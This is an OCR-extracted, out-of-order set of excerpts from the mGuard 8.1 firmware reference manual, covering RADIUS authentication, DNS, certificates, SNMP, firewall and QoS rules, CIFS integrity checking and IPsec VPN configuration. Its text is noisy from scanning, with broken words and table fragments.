Software Reference Manual mGuard Firmware 8.1
Contents
1. 105661_en_02 Via VPN If Yes is selected the mGuard authentication query is always sent via an encrypted VPN tunnel if a suitable one is available If No is selected a query of this type is always sent unen crypted outside the VPN If Yes has been selected under Via VPN then the mGuard supports queries from a RA DIUS server through its VPN connection This happens automatically whenever the RA DIUS server belongs to the remote network of a configured VPN tunnel and the mGuard has an internal IP address belonging to the local network of the same VPN tunnel This makes the authentication query dependent on the availability of a VPN tunnel During configuration ensure that the failure of a single VPN tunnel does not prevent administrative access to the mGuard Port The port number used by the RADIUS server Secret RADIUS server password This password must be the same as on the mGuard The mGuard uses this password to exchange messages with the RADIUS server and to encrypt the user password The RA DIUS server password is not transmitted in the network The password is important for security since the mGuard can be rendered vulnerable to attack at this point if passwords are too weak We recom mend a password with at least 32 characters and several special characters It must be changed on a regular basis If the RADIUS secret is discovered an attacker can read the user password for the RADIUS au thentication que2. No users are logged in 7 3 Authentication gt gt RADIUS RADIUS Servers RADIUS Servers RADIUS timeout 3 seconds RADIUS retries 3 RADIUS NAS Identifier radius example com No v 1812 secret 449 radius example com No v 1812 secret A RADIUS server is a central authentication server used by devices and services for check ing user passwords The password is not known to these devices and services Only one or a number of RADIUS servers know the password The RADIUS server also provides the device or service that a user wishes to access with further information about the user e g the group to which the user belongs In this way all user settings can be managed centrally In order to activate RADIUS authentication Yes must be set under Authentication gt gt Firewall Users Enable group authentication sub item and RADIUS selected as the Authen tication Method Under Authentication gt gt RADIUS Servers a list of RADIUS servers used by the mGuard is generated This list is also used when RADIUS authentication is activated for administrative access SSH HTTPS Innominate Security Technologies 187 mGuard 8 1 When RADIUS authentication is active the login attempt is forwarded from a non pre defined user not root admin netadmin audit or user to all RADIUS servers listed here The first response received by the mGuard from one of the RADIUS servers determines whether or not the authenticat
3. Provider defined e g via PPPoE or DHCP The domain name servers of the Internet service provider that provide access to the Internet are used Only select this setting if the mGuard operates in PPPoE PPTP Modem mode or in Router mode with DHCP User defined from field below If this setting is selected the mGuard will connect to the domain name servers listed under User defined name servers 105661_en_02 Innominate Security Technologies 157 mGuard 8 1 Network gt gt DNS gt gt DNS server User defined name The IP addresses of domain name servers can be entered in servers this list If these should be used by the mGuard select the User defined from field below option under Servers to query Local Resolving of Host You can configure multiple entries with assignment pairs of host names and IP addresses names for various domain names You have the option to define change edit and delete assignment pairs of host names and IP addresses You can also activate or deactivate the resolution of host names for a domain In addition you can delete a domain with all its assignment pairs Creating a table with assignment pairs for a domain e Open anew row and click on Edit in this row Changing or deleting assignment pairs belonging to a domain e Click on Edit in the relevant table row After clicking on Edit the DNS Records tab page is displayed DNS Records Local Resolving of Hostnames Domain
4. Upload PKCS 12 Filename Durchsuchen_ Import Password Download Certificate Authentication gt gt Certificates gt gt Machine Certificates Machine Certificates Importing a new machine certificate 105661 _en_02 Shows the currently imported X 509 certificates that the mGuard uses to authen ticate itself to partners e g other VPN gateways To import a new certificate proceed as follows Requirement The PKCS 12 file file name extension p12 or pfx is saved on the connected computer Proceed as follows e Click on Browse to select the file e Inthe Password field enter the password used to protect the private key of the PKCS 12 file e Click on Import Once imported the loaded certificate appears under Certificate e Remember to save the imported certificate along with the other entries by clicking on the Apply button Innominate Security Technologies 197 mGuard 8 1 Using the short name Shortname When importing a machine certificate the CN attribute from the certificate subject field is suggested as the short name here providing the Shortname field is empty at this point This name can be adopted or another name can be chosen e A name must be assigned whether it is the suggested one or another Names must be unique and must not be assigned more than once During the configuration of SSH Management gt gt System Settings Shell Access menu HTTPS M
5. An IP address To specify an address area use CIDR format see CIDR Classless Inter Domain Routing on page 24 0 0 0 0 0 means all addresses Interface External Internal External 2 VPN Dial in Specifies to which interface the rule should apply If no rules are set or if no rule applies the following default set tings apply SNMP monitoring is permitted via nternal VPN and Dial in Access via External and External 2 is refused Specify the monitoring options according to your require ments NOTE If you want to refuse access via Internal Q VPN or Dial in you must implement this explicitly by means of corresponding firewall rules for example by specifying Drop as an action To prevent your own access being blocked you may have to permit access simultaneously via an other interface explicitly with Accept before click ing on the Apply button to activate the new set ting Otherwise if your access is blocked you must carry out the recovery procedure 105661_en_02 Innominate Security Technologies 81 mGuard 8 1 Management gt gt SNMP gt gt Query Action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not
6. No an e mail is not sent to the address specified below Only with faults and deviations an e mail is sent to the ad dress specified below if a deviation is detected during CIFS in tegrity checking or if the check could not be carried out due to an access error An e mail is sent to this address either after every check or only if a deviation is detected during CIFS integrity checking or if the check could not be carried out due to an access error Text entered in the subject field of the e mail Innominate Security Technologies 233 mGuard 8 1 CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings Checking of Shares State Nocheck is currently being performed The share check has been suspended A drive check is currently in progress An integrity database is currently being created The share has not yet been checked Probably no integri ty database exists Last check finished successfully The process failed due to an unforeseen condition please consult the logs Last check was aborted due to timeout The integrity database is missing or incomplete The signature of the integrity database is invalid The integrity database was created with a different hash algorithm The integrity database is the wrong version The share which is to be checked is not available The share which is to be used as checksum memory is not available
7. nal switch Packages mguard api_0 mbin action switch reset phy counters Port Name of the Ethernet connection to which the row refers tx collisions Number of errors while sending the data tx octets Data volume sent 105661_en_02 Innominate Security Technologies 149 mGuard 8 1 Network gt gt Ethernet gt gt MAU settings rx fcs errors Number of received frames with invalid checksum rx good octets Volume of the valid data received 6 2 2 Multicast a Only available with the mGuard rs4000 3G Network Ethernet MAU settings Multicast Ethernet Static Multicast Groups E 01 00 5e 00 00 00 Yes v Yes v Yes v Yes v General Multicast Configuration IGMP Snooping Yes w IGMP Snoop Aging 300 IGMP Query off IGMP Query Interval 120 Multicast Groups Update Interval 10s 01 00 5e 00 00 00 Yes Yes Yes Yes Network gt gt Ethernet gt gt Multicast Static Multicast Groups Multicast is a technology which enables data to be sent to a group of recipients without the transmitter having to send it multiple times The data replication takes place through the distributor within the network You can create a list of multicast addresses The data is forwarded to the configured ports LAN1 LAN4 General Multicast Configu IGMP snooping The switch uses IGMP snooping to guarantee that multicast ration data is only forwarded via ports which are intended for this use IGMP Snoop Aging Per
8. speci fied in kbps or packets per second In order to optimize prioritization the total bandwidth specified here should be slightly lower than the actual amount This pre vents a buffer overrun on the transferring devices which would result in adverse effects Queues Name The default name for the egress queue can be adopted or an other can be assigned The name does not specify the priority level Guaranteed Bandwidth that should be available at all times for the relevant queue Based on the selection under Bandwidth Rate Limit kbps OR Packet s meaning that the unit of measurement does not have to be specified explicitly here The total of all guaranteed bandwidths must be less than or equal to the total bandwidth 105661_en_02 Innominate Security Technologies 299 mGuard 8 1 QoS menu gt gt Egress Queues gt gt Internal External External 2 Dial in QoS menu gt gt Egress Queues VPN gt gt VPN via Internal VPN via External VPN via External 2 VPN via Dial in Upper Limit Maximum bandwidth available that may be set for the relevant queue by the system Based on the selection under Band width Rate Limit kbps OR Packet s meaning that the unit of measurement does not have to be specified explicitly here The value must be greater than or equal to the guaranteed bandwidth The value unlimited can also be specified which means that there is no further restriction Priority Low Medium High Specifies with
9. 105661_en_02 Authentication menu 7 4 2 Machine Certificates The mGuard authenticates itself to the partner using a machine certificate loaded on the mGuard The machine certificate acts as an ID card for the mGuard which it shows to the relevant partner For a more detailed explanation see Authentication gt gt Certificates on page 190 By importing a PKCS 12 file the mGuard is provided with a private key and the correspond ing machine certificate Multiple PKCS 12 files can be loaded on the mGuard enabling the mGuard to show the desired self signed or CA signed machine certificate to the partner for various connections In order to use the machine certificate installed at this point it must be referenced addition ally during the configuration of applications SSH VPN so that it can be used for the rele vant connection or remote access type Example of imported machine certificates Authentication Certificates Certificate settings Machine Certificates CA Certificates Remote Certificates CRL Machine Certificates Sx Subject CN VPN Endpunkt Kundendienst L KS O Beispiel Lieferant C DE Subject Alternative Names Issuer CN VPN SubCA 01 0 Beispiel Lieferant C DE Validity From Mar 20 18 37 57 2007 GMT to Mar 20 18 37 57 2010 GMT Fingerprint MDS 17 DC 51 54 98 88 BC 13 63 A9 89 F2 63 0B 18 32 SHA1 AF DC D1 F6 18 CD A7 6F 25 B5 1A 54 2D FE 95 44 1E 6B 8E 29 Shoriname PN Endpunkt Kundendienst KS
10. 5 2 Blade Control gt gt Blade 01 to 12 These pages display the status information for each installed mGuard device and enable the configuration of the relevant mGuard device to be backed up and restored 5 2 1 Blade in slot Blade Control Blade 03 Blade in slot 03 Configuration Overview Device type blade ID bus controller ID 0x22 0x3 0x1 0x1 Serial number 27500087 Flash ID 000c00034100692f Software version 7 4 1 default MAC addresses 00 0c be 02 0e f0 00 0c be 02 0e f1 00 0c be 02 0e f2 00 0c be 02 0e f3 Status ey LAN link status iyi WAN link status ie Temperature N A Blade Control gt gt Blade xx gt gt Blade in slot xx Overview Device type Device name e g blade or blade XL ID bus controller ID ID of this slot on the control bus of the bladebase Serial number Serial number of the mGuard Flash ID Flash ID of the flash memory of the mGuard Software version Version of the software installed on the mGuard MAC addresses All MAC addresses used by the mGuard Status mGuard status LAN status Status of the LAN port WAN link status Status of the WAN port Temperature N A Not available 102 Innominate Security Technologies 105661_en_02 Blade Control menu 5 2 2 Configuration Blade Control Blade 01 Blade in slot 01 Configuration Configuration No configuration file Configuration backup a Blade 01 gt Controller Reconfiguration if Bla
11. Advanced on page 216 complex connections of this type are tracked In this case the administrator only needs to create a firewall rule on the mGuard which allows the client to establish a control channel to the FTP server The mGuard enables the server to establish a data channel au tomatically regardless of whether the firewall rules allow for this The tracking of complex connections is part of the firewall state synchronization process However to keep the latency short the mGuard forwards the network packets indepen dently from the firewall state synchronization update that has been triggered by the network packets themselves Therefore it may be the case for a very brief period that a state change for the complex con nection is not forwarded to the mGuard on standby if the active mGuard fails In this case tracking of the connection from the mGuard which is active after the fail over is not contin ued correctly This cannot be corrected by the mGuard The data link is then reset or inter rupted Fail over when establishing semi unidirectional connections A semi unidirectional connection refers to a single IP connection such as UDP connec tions where the data only travels in one direction after the connection is established with a bidirectional handshake The data flows from the responder to the initiator The initiator only sends data packets at the very start The following applies only to certain protocols which
12. Firewall rules for web access to the mGuard via HTTPS Management gt gt Web Settings gt gt Access menu Log ID fw https access Firewall rules for access to the mGuard via SNMP Management gt gt SNMP gt gt Query menu Log ID fw snmp access Firewall rules for SSH remote access to the mGuard Management gt gt System Settings gt gt Shell Access menu Log ID fw ssh access Firewall rules for the user firewall Network Security gt gt User Firewall menu Firewall rules Log ID ufw Rules for NAT port forwarding Network gt gt NAT gt gt IP and Port Forwarding menu Log ID fw portforwarding Firewall rules for the serial interface Network gt gt Interfaces gt gt Dial in menu Incoming Rules Log ID fw serial incoming Outgoing Rules Log ID fw serial outgoing 324 Innominate Security Technologies 105661_en_02 General messages When activating a configu ration profile on a blade When retrieving a configu ration profile from a blade 105661_en_02 Logging menu Searching for firewall rules on the basis of a network security log If the Network Security checkbox is enabled so that the relevant log entries are displayed the Jump to firewall rule search field is displayed below the Reload logs button Proceed as follows if you want to trace the firewall rule referenced by a log entry in the Network Security category and which resulted in the corresponding event 1 Select the
13. Gateway indicates the IP addresses of the communicating VPN gateways Traffic refers to the computers and networks that communicate via the VPN gateways Refers to the subject of an X 509 certificate ISAKMP State Internet Security Association and Key Management Protocol is set to es tablished if both VPN gateways involved have established a channel for key exchange In this case they have been able to contact one another and all entries up to and including ISAKMP SA on the connection configuration page are correct IPsec State is set to established if IPsec encryption is activated for communication In this case the data under IPsec SA and Tunnel Settings is also correct Innominate Security Technologies 285 mGuard 8 1 If displayed 286 ISAKMP SA established IPsec State WAITING IPsec State IPsec SA estab lished Innominate Security Technologies In the event of problems it is recommended that you check the VPN logs of the partner to which the connection was established This is because detailed error messages are not for warded to the initiating computer for security reasons This means that Authentication was successful but the other parameters did not match Does the connec tion type tunnel transport correspond If Tunnel is selected do the network areas match on both sides The VPN connection is established successfully and can be used However if this is not p
14. Management menu X 509 Authentication X 509 certificates for SSH The mGuard supports the authentication of SSH clients using X 509 certificates It is suffi clients cient to configure CA certificates that are required for the establishment and validity check of a certificate chain This certificate chain must exist between the CA certificate on the mGuard and the X 509 certificate shown to the SSH client see Shell Access on page 40 If the validity period of the client certificate is checked by the mGuard see Certificate set tings on page 195 new CA certificates must be configured on the mGuard at some point This must take place before the SSH clients use their new client certificates If the CRL check is activated under Authentication gt gt Certificates gt gt Certificate settings one URL where the corresponding CRL is available must be maintained for each CA cer tificate The URL and CRL must be published before the mGuard uses the CA certificates in order to confirm the validity of the certificates shown by the VPN partners Enable X 509 certificates for SSH Ya w access S5H server certificate mguard hh kunde de gt x F F SSH RootCA 01 w g E S5H 5ubCA DI w p x X09 subject Authorized for access as et CN OU Admin O admin w x Client certificate Authorized for access as l E Krafti Herbert r root Y F E Findigi Fetra root wY Management gt gt System Settings gt gt Shell Acces
15. Management of the mGuard via HTTPS see Management gt gt Web Settings on page 56 Access on page 57 Certificates can be used to identify authenticate oneself to others The certificate used by the mGuard to identify itself to others shall be referred to as the machine certificate here in line with Microsoft Windows terminology A certificate certificate specific to an individual or user certificate showing a person is one used by operators to authenticate themselves to partners e g an operator attempting to access the mGuard via HTTPS and a web browser for the purpose of remote configura tion A certificate specific to an individual can also be saved on a chip card and then in serted by its owner in the card reader of their computer when prompted by a web browser during establishment of the connection for example 190 Innominate Security Technologies 105661_en_02 Remote certificate CA Certificates 105661_en_02 Authentication menu A certificate is thus used by its owner person or machine as a form of ID in order to verify that they really are the individual they identify themselves as As there are at least two com munication partners the process takes place alternately partner A shows their certificate to partner B partner B then shows their certificate to partner A Provision is made for the following so that A can accept the certificate shown by B i e the certificate of i
16. Power supply 1 2 State of both power supply units only mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard centerport mGuard industrial rs mGuard smart mGuard pci SD mGuard pcie SD mGuard delta EAGLE mGuard System Temperature An SNMP trap is triggered if the temperature exceeds or falls C below the specified temperature range only mGuard centerport not with firmware 7 6 0 CPU temperature C An SNMP trap is triggered if the temperature exceeds or falls below the specified temperature range 105661_en_02 Innominate Security Technologies 33 mGuard 8 1 Management gt gt System Settings gt gt Host System DNS Hostname Hostname mode Host name Domain search path You can assign a name to the mGuard using the Hostname mode and Hostname fields This name is then displayed for example when logging in via SSH see Management gt gt Sys tem Settings on page 33 Shell Access on page 40 As signing names simplifies the administration of multiple mGuard devices User defined from field below Default The name entered in the Hostname field is the name used for the mGuard If the mGuard is running in Stealth mode the User defined option must be selected under Hostname mode Provider defined e g via DHCP If the selected network mode permits external setting of the host name e g via DHCP the name supplied by the provider is assigned to the mGuard
17. VPN connections which have been started via a text message switch button nph vpn cgi or the web interface are aborted once this time has elapsed Only available with the mGuard rs4000 rs2000 3G Incoming text messages can be used to start or stop VPN con nections The text message must contain the command vpn start or vpn stop followed by the token Yes No default No If the TCP Encapsulation function is used see TCP Encap sulation on page 250 only set this option to Yes if the mGuard is to encapsulate its own outgoing data traffic for the VPN connection it initiated In this case the number of the port where the partner receives the encapsulated data packets must also be specified When Yes is selected the mGuard will not attempt to estab lish the VPN connection using standard IKE encryption UDP port 500 and 4500 Instead the connection is always encap sulated using TCP Default 8080 Number of the port where the encapsulated data packets are received by the partner The port number specified here must be the same as the one specified for the mGuard of the partner under TCP port to listen on Psec VPN gt gt Global gt gt Options menu item If TCP Encapsulation is used see Page 250 Ifthe mGuard is to establish a VPN connection to a main tenance center and encapsulate the data traffic there Initiate or Initiate on traffic must be specified f the mGuard is installed a
18. 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v External 2 settings for egress queue rules QoS Egress Rules External 2 Dial in Default Queue Default PEE protocol rromi f romeo or Topot currentrosmsc New TOSDSCP i 1 a wv 0 00 00 any 0 0 0 0 0 any TOS Minimize Delay w Unchanged v Urgent v p E 2 A v 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability ow Unchanged v important v FEH a v 000 00 any 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v Dial in settings for egress queue rules QoS Egress Rules SX a Fromeon ror Toron Current Tossca New TOSIDSCP Fia v 0000 any 0 0 0 0 0 any TOS Minimize Delay v Unchanged v Urgent v El 2 A v v 0 0 0 0 0 any 0 0 0 0 0 any TOS Maximize Reliability w Unchanged v Important v F3 ai v 00 0 00 any 0 0 0 0 0 any TOS Minimize Cost v Unchanged v Low Priority v 105661_en_02 Innominate Security Technologies 301 m Guard 8 1 12 4 2 Egress Rules VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in VPN via Internal settings for egress queue rules QoS Egress Rules VPN VPN via Internal VPN via External VPN via External 2 VPN via Dial in Default Rules PES protccot rrome rromrot_ ror Topot currentT0smscr_ newtosmsce aueue tame _ comment _ 1 Al w
19. 59 mGuard 8 1 Management gt gt Web Settings gt gt Access Action Comment Log RADIUS Authentication Enable RADIUS This menu item is not included authentication in the scope of functions for the mGuard rs2000 3G mGuard rs2000 1 60 Innominate Security Technologies Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Re ject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Freely selectable comment for this rule For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting If set to No the passwords of users who log in via HTTPS are checked via the local database The User authentication method can only be set to Login restricted to X 509 client certificate if No is selected Select Yes to enable users to be authenticated via the RA DIUS server The password is only checked locally in the case of predefined users root admin netadmin audit and user The netadmin and audit authorization levels relate to access rights with the mGuard device manager You should only select As only method for password authentication
20. A file could not be read due to an I O failure Please con sult the report The directory tree could not be traversed due to an I O fail ure Please consult the report The signature has not yet been checked The signature is valid Enabled No a check is not triggered for this network drive The mGuard has not connected this drive The status cannot be viewed Yes a check is triggered regularly for this network drive Suspended the check has been suspended until further no tice The status can be viewed Checked CIFS Share Name of the network drive to be checked specified under CIFS Integrity Monitoring gt gt Importable Shares gt gt Edit Checksum Memory In order to perform the check the mGuard must be provided with a network drive for storing the files The checksum memory can be accessed via the external net work interface Action Click on Edit to make further settings for checking network drives 234 Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring CIFS Integrity Checking C Checked Share Management Settings Enabled Yes X Checked CIFS Share C f Mounted and usable Patterns for filenames For C Time Schedule Continuous v Maximum time a check may take 180 m Please note No regular check will happen unless the system time of the mGuard has been set either manually or with the help of NTP Please note If a check is still run
21. Default gateway in the main building IP address of default gateway 192 168 1 253 16 Innominate Security Technologies 105661_en_02 mGuard basics 1 2 6 Resolving network conflicts ll a A j 10 0 EPA ka Ta M Resolving network conflicts In the example the networks on the right hand side should be accessible to the network or computer on the left hand side However for historical or technical reasons the networks on the right hand side overlap The 1 1 NAT feature of the mGuard can be used to translate these networks to other net works thereby resolving the conflict 1 1 NAT can be used in normal routing and in IPsec tunnels 105661_en_02 Innominate Security Technologies 17 mGuard 8 1 18 Innominate Security Technologies 105661_en_02 Configuration help 2 Configuration help 105661_en_02 a 2 1 Suitable browsers The device can be configured easily using a web browser To configure the mGuard use a web browser with SSL encryption HTTPS Browsers with SSL encryption HTTPS approved by Innominate Mozilla Firefox Version 4 or later Google Chrome Version 12 or later Microsoft Internet Explorer Version 8 or later Apple Safari Version 5 1 7 or later a Further information can be found on the Innominate website at www innominate
22. IPsec VPN gt gt Connections gt gt Edit gt gt General Local Remote for Define the network areas for both tunnel ends under Local Tunnel connection type and Remote _ _ _ 7 g IPsec tunnel Z j ay a OEE e a i at Local VPN gateway Network Network Remote Remote Type Tunnel No NAT 1 1 NAT Masquerade It is possible to translate the IP addresses of devices located at the respective end of the VPN tunnel No NAT NAT is not performed Local Here specify the address of the network or computer which is connected locally to the mGuard Type Tunnel Local 1 1 NAT wee tosa Remote Action Action Tunnel 192 168 1 1 32 192 166 254 1 32 1 1 NAT r 1 1 NAT 192 168 2 1 With 1 1 NAT the IP addresses of devices at the local end of the tunnel are exchanged so that each individual address is translated into another specific address It is not translated into an IP address that is identical for all devices as is the case with Masquerading If local devices transmit data packets only those data packets are considered which Are actually encrypted by the mGuard the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source Originate from a source address within the network which is defined here Have their destination address in the network of the part ner if 1 1 NAT is no
23. If the User defined option is selected under Hostname mode enter the name that should be assigned to the mGuard here Otherwise this entry will be ignored i e if the Provider de fined option e g via DHCP is selected under Hostname mode This option makes it easier for the user to enter a domain name If the user enters the domain name in an abbreviated form the mGuard completes the entry by appending the do main suffix that is defined here under Domain search path SNMP Information System name A name that can be freely assigned to the mGuard for admin istration purposes e g Hermes Pluto Under SNMP sysName Location A description of the installation location that can be freely as signed e g Hall IV Corridor 3 Control cabinet Under SNMP sysLocation Contact The name of the contact person responsible for the mGuard ideally including the phone number Under SNMP sysCon tact Keyboard only mGuard centerport Keyboard Keyboard Layout qwertz de latini nodeadkeys w Repetition Rate 30 Repetition Delay 250 w Keyboard Layout Repetition Rate Repetition Delay 34 Innominate Security Technologies Selection list for selecting the appropriate keyboard layout Determines how many characters the keyboard generates per second when a key is held down Default 30 Determines how long a key must be held down on the key board until the repeat fu
24. Often the IP addresses of partner VPN gateways must be requested from the DynDNS service or they must be kept up to date by new queries Sporadically the mGuard is configured so that SNMP traps are sent to the remote server Sporadically the mGuard is configured to permit and accept remote access via HTTPS SSH or SNMP The mGuard then sends reply packets to every IP address from which an access attempt is made if the firewall rules permit this access Often the mGuard is configured to connect to an HTTPS server at regular intervals in order to download any configuration profiles available there see Management gt gt Central Management on page 91 When No is selected the mGuard establishes a telephone connection using the connected modem as soon as possible after a restart or activation of Modem network mode This re mains permanently in place regardless of whether or not data is transmitted If the telephone connection is then interrupted the mGuard attempts to restore it immediately Thus a perma nent connection is created like a permanent line By doing this the mGuard is constantly available externally i e for in coming data packets 134 Innominate Security Technologies 105661_en_02 Network gt gt Interfaces gt gt Dial out 105661_en_02 Idle timeout Idle time Seconds Local IP Remote IP Netmask Network menu Yes No Only considered when Dial on demand is set to Ye
25. The configuration on the external storage medium also contains the passwords for the root admin netadmin audit and user users These passwords are also loaded when loading from an external storage medium The netadmin and audit authorization levels re late to access rights with the mGuard device manager 4 5 Management gt gt SNMP The mGuard must not be simultaneously configured via the web access shell access or SNMP Simultaneous configuration via the different access methods might lead to unex pected results 4 5 1 Query Management SNMP 4 Query Trap LLDP Settings Enable SNMPw3 access Yes w Enable SNMPw1 v2 access Yes w connections 161 Run SNMF Agent under the ermissions of the following admin T user SNMPv1 v Community Read Write Community private Read Only Community public Allowed Networks Log Ic tw enmp access 2e2eTadd 2 1 gt X omie O intertace o Action O Comment FE i 10 0 0 0 8 External Accept The SNMP Simple Network Management Protocol is mainly used in more complex net works to monitor the state and operation of devices SNMP is available in several releases SNMPv1 SNMPv2 and SNMPvs The older versions SNMPv1 SNMPv2 do not use encryption and are not considered to be secure The use of SNMPv1 SNMPv2 is therefore not recommended SNMPv3 is significantly better in terms of security but not all management consoles support this version yet 105661_en_02 Inn
26. ea Yes v DMZ WAN Log ID fw dmz outgoing wan N 3391 dde1 f26e 13820 s50e 000cbe0005ee x Protocol From IP From Port To IP To Port Action Comment Log ES SHa a v 00 0 00 any 0 0 0 0 0 any Accept v Yes v Log entries for unknown connection o o attempts 7 LAN DMZ Log ID fw dmz outgoing lan N 3391dde2 f26e 1920 s50e 000cbe0005ee D x Protocol From IP From Port To IP To Port Action Comment Log F 1 TCP 0 0 0 0 0 any 0 0 0 0 0 any Accept w Yes v Log entries for unknown connection y attempts Network Security gt gt Packet Filter gt gt DMZ Firewall rules for DMZ WAN DMZ Default the data packets of all incoming connections are re jected DMZ LAN Default the data packets of all incoming connections are re jected DMZ WAN Default the data packets of all outgoing connections are al lowed LAN DMZ Default the data packets of all outgoing connections are al lowed Protocol All means TCP UDP ICMP GRE and other IP protocols From IP To IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 210 Innominate Security Technologies 105661_en_02 Network Security gt gt Packet Filter gt gt DMZ 105661_en_02 From Port To Port Action Comment Log Log entries for unknown connection attempts Network Security menu Only evaluated for TCP and UDP protoc
27. ham wvic INFO disabled IP forwarding and other conditions ham ac extl AC INFO ham ac 3417 eth0 listening to CARP messages ham ac syncif AC INFO ham ac 3432 eth2 listening to CARP messages ham ac int AC INFO ham ac 3399 eth1 listening to CARP messages ham vic INFO disabled virtual interface eth0 vif ham wvic INFO disabled virtual interface ethl vif ham vic INFO disabled ARP daemon 0 ham ssv INFO transitioned to state outdated ham ssv INFO transitioned to state on_standby ham wvic INFO enabled IP forwarding and other conditions ham ssv INFO transitioned to state becomes active ham ac symcit AC INFO ham ac 3432 eth2 sending CARP messages and listening to them ham ac exti AC INFO ham eac 3417 etho sending CARP messages and listening to them ham ac inmt AC INFO ham ac 33993 ethi sending CARP messages and listening to them hem ssv INFO sigalrm timeout ham ssv INFO transitioned to state active Iham vic INFO enabled virtual interface etho wit ham vic INFO enabled virtual interface ethi wit ham vic INFO enabled ARP daemon 0 ham vsr INFO terminating ham vsr INFO ham ws2r 3459 terminated ham fsr INFO terminating ham fsr INFO ham ftsr 3453 terminated ham ssv WARN cali read funmc receive report line 444 errno 104 Connection reset by ham ssv WARN calil read func receive report line 444 errno 104 Connection reset by ham ssv INFO transitioned to state active
28. nected to the control center The mGuard can then be called by a remote partner if this partner has been dynami cally assigned its IP address by the Internet service provider i e ithas an IP address that changes In this scenario you may only specify an IP address if the remote calling partner also has a fixed and known IP address any can only be used together with the authentication method using X 509 certificates If locally stored CA certificates are to be used to authenticate the partner the address of the VPN gateway of the partner can be specified explicitly by means of an IP address or host name or by any If it is specified using an explicit address and not by any then a VPN identifier see VPN Identifier on page 272 must be specified Yany must be selected if the partner is located downstream of a NAT gateway Other wise the renegotiation of new connection keys will fail on initial contact If TCP Encapsulation is used see TCP Encapsulation on page 250 a fixed IP address or a host name must be specified if this mGuard is to initiate the VPN connection and en capsulate the VPN data traffic me me fee me If this mGuard is installed upstream of a maintenance center to which multiple remote mGuard devices establish VPN connections and transmit encapsulated data packets Yany must be specified for the VPN gateway of the partner 258 Innominate Security Technologies 10
29. 1 1 NAT only in router network mode Port forwarding not in stea th network mode Individual firewall rules for different users user firewall Individual rule sets as action target of firewall rules apart from user firewall or VPN firewall CIFS integrity check of network drives for changes to specific file types e g execut able files Anti virus scan connector which supports central monitoring of network drives with vi rus scanners Innominate Security Technologies 11 mGuard 8 1 VPN features Protocol IPsec tunnel and transport mode IPsec encryption in hardware with DES 56 bits 3DES 168 bits and AES 128 192 256 bits Packet authentication MD5 SHA 1 Internet Key Exchange IKE with main and quick mode Authentication via Pre shared key PSK X 509v3 certificates with public key infrastructure PKI with certification authority CA optional certificate revocation list CRL and the option of filtering by subject or Partner certificate e g self signed certificates Detection of changing partner IP addresses via DynDNS NAT traversal NAT T Dead Peer Detection DPD detection of IPsec connection aborts IPsec L2TP server connection of IPsec L2TP clients IPsec firewall and 1 1 NAT Default route over VPN tunnel Data forwarding between VPNs hub and spoke Depending on the license up to 250 VPN channels in the case of mGuard centerport
30. 2 bytes of address area 256 x 256 There can be 32 x 256 x 256 Class C networks and each of these networks can have up to 256 hosts 1 byte of address area Subnet mask Normally a company network with access to the Internet is only officially assigned a single IP address e g 123 456 789 21 The first byte of this example address indicates that this company network is a Class B network in other words the last two bytes are free to be used for host addressing Accordingly an address area for up to 65 536 possible hosts 256 x 256 can be computed Such a huge network is not practical and generates a need for subnetworks to be built The subnet mask is used here Like an IP address the mask is 4 bytes long The bytes repre senting the network address are each assigned the value 255 The primary purpose of doing this is to enable a portion of the host address area to be borrowed and used for ad dressing subnetworks For example if the subnet mask 255 255 255 0 is used on a Class B network 2 bytes for the network address 2 bytes for the host address the third byte which was actually intended for host addressing can now be used for subnetwork address ing This computes to potential support for 256 subnetworks each with 256 hosts IP security IPsec is a standard that uses encryption to verify the authenticity of the sender and to ensure the confidentiality and integrity of the data in IP datagrams Datagram on page
31. Authentication using the corresponding remote certificate e Select the following entry from the selection list No CA certificate but the Remote Certificate below e Install the remote certificate under Remote Certificate see Installing the remote certif icate on page 271 It is not possible to reference a remote certificate loaded under the Authentication gt gt Cer tificates menu item Installing the remote certificate The remote certificate must be configured if the VPN partner is to be authenticated using a remote certificate To import a certificate proceed as follows Innominate Security Technologies 2 71 mGuard 8 1 Requirement IPsec VPN gt gt Connections gt gt Edit gt gt Authentication VPN Identifier The certificate file file name extension pem cer or crt is saved on the connected com puter e Click on Browse to select the file e Click on Upload The contents of the certificate file are then displayed Authentication method CA certificate The following explanation applies if the VPN partner is authenticated using CA certifi cates VPN gateways use the VPN identifier to detect which configurations belong to the same VPN connection If the mGuard consults CA certificates to authenticate a VPN partner then it is possible to use the VPN identifier as a filter e Make acorresponding entry in the Remote field Local Remote 2 2 Innominate Sec
32. For additional information about the table see Authentication gt gt Certificates on page 190 Authentication for VPN The partner shows the Machine certificate signed Machine certificate self following by CA signed The mGuard authenti cates the partner using Remote certificate Remote certificate Or all CA certificates that form the chain to the root CA certificate together with the certificate shown by the part ner According to this table the certificates that must be provided are the ones the mGuard uses to authenticate the relevant VPN partner The following instructions assume that the certificates have already been correctly installed on the mGuard see Authentication gt gt Certificates on page 190 apart from the remote certificate If the use of revocation lists CRL checking is activated under the Authentication gt gt Cer tificates Certificate settings menu item each certificate signed by a CA that is shown by the VPN partner is checked for revocations This excludes locally configured imported remote certificates 270 Innominate Security Technologies 105661_en_02 Self signed machine cer tificate a Machine certificate signed by the CA 105661_en_02 IPsec VPN menu Remote CA Certificate If the VPN partner authenticates itself with a self signed machine certificate e Select the following entry from the selection list No CA certificate but the Remot
